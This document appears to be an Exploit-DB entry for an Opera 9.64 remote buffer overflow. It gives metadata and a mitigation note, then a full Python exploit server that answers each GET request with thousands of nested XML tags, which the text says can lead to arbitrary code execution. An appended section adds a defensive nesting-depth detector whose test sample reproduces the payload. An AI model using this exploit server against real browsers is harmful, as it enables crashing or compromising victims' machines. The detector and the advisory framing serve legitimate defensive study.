Vendor: Opera
By: Ahmed Obied
CVSS: 9.3 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Opera
Affected Version From: 9.64
Affected Version To: 9.64
Patch Exists: YES
Related CWE: N/A
CPE: a:opera_software:opera
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2021

Opera 9.64 Remote Buffer Overflow Exploit

This exploit is similar to the bug found by Wojciech Pawlikowski for Firefox. It was tested using the latest version of Opera (9.64). The script runs a web server that answers a GET request for / with a Content-type header of text/xml and a body of 7400 '<A>' tags wrapped in '<xml>' and '</xml>'. This causes a buffer overflow and can be used to execute arbitrary code.

Mitigation:

Update to the latest version of Opera.

Exploit-DB raw data:

#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   - Similar to the bug found by Wojciech Pawlikowski for Firefox 
#     -> http://www.milw0rm.com/exploits/8306
#
#   - Tested using the latest version of Opera (9.64)
#
#   Usage  : python opera.py [port]
#    

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):
        
    def get_exploit(self):
        exploit = '<A>' * 7400
        exploit = '<xml>' + exploit + '</xml>'
        return exploit
            
    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        if self.path == '/':
            print
            print '[-] Incoming connection from %s' % self.client_address[0]
            print '[-] Sending header to %s ...' % self.client_address[0]
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            print '[-] Header sent to %s' % self.client_address[0]
            print '[-] Sending exploit to %s ...' % self.client_address[0]
            self.wfile.write(self.get_exploit())
            print '[-] Exploit sent to %s' % self.client_address[0]

def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port]' % sys.argv[0]
        sys.exit(1)
    try:
        port = int(sys.argv[1])
        if port < 1 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except KeyboardInterrupt:
                print '[-] Exiting ...' 
        except socket.error:
            print '[*] ERROR: a socket error has occurred ...'
        sys.exit(-1)    
    except ValueError:
        print '[*] ERROR: invalid port number ...'
        sys.exit(-1)
            
if __name__ == '__main__':
    main()

# milw0rm.com [2009-03-30]
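
A detection-side check for the response shape the script above serves, added here as an example and not part of the original exploit or the Exploit-DB entry: it measures XML element nesting depth so a proxy or IDS hook can flag XML bodies that nest far deeper than real documents do. The 256-level limit, the function names and both sample documents are assumptions constructed for illustration.

```python
import re

# Assumption: legitimate XML rarely nests beyond a few dozen levels; tune per site.
MAX_DEPTH = 256

# Comments and CDATA may contain '<' and '>' that are not markup, so drop them first.
_SKIP = re.compile(r"<!--.*?-->|<!\[CDATA\[.*?\]\]>", re.S)
# Opening, closing and self-closing element tags. Declarations such as
# <?xml ...?> and <!DOCTYPE ...> do not match because a name must start
# with a letter or underscore.
_TAG = re.compile(r"<(?P<close>/)?[A-Za-z_][^\s/<>]*[^<>]*?(?P<selfclose>/)?>")

def max_nesting_depth(body):
    """Return the largest number of simultaneously open elements in body."""
    depth = deepest = 0
    for m in _TAG.finditer(_SKIP.sub("", body)):
        if m.group("close"):
            depth = max(depth - 1, 0)      # tolerate stray closing tags
        elif not m.group("selfclose"):
            depth += 1
            deepest = max(deepest, depth)
    return deepest

def is_suspicious(content_type, body, limit=MAX_DEPTH):
    """Flag XML-typed responses whose nesting depth exceeds limit."""
    ctype = content_type.split(";")[0].strip().lower()
    if not (ctype.endswith("/xml") or ctype.endswith("+xml")):
        return False
    return max_nesting_depth(body) > limit

# Constructed samples: the deep document has the same shape as the body
# built by get_exploit() above; the feed is an ordinary small XML document.
SAMPLE_DEEP = "<xml>" + "<A>" * 7400 + "</xml>"
SAMPLE_FEED = ('<?xml version="1.0"?><feed><entry><title>x</title>'
               '<link href="a"/></entry></feed>')

if __name__ == "__main__":
    for name, doc in (("deep", SAMPLE_DEEP), ("feed", SAMPLE_FEED)):
        print(name, max_nesting_depth(doc), is_suspicious("text/xml", doc))
```

The tag scanner is a heuristic, not a conforming XML parser: an attribute value containing '>' will be miscounted, which is acceptable for a depth alarm but not for validation.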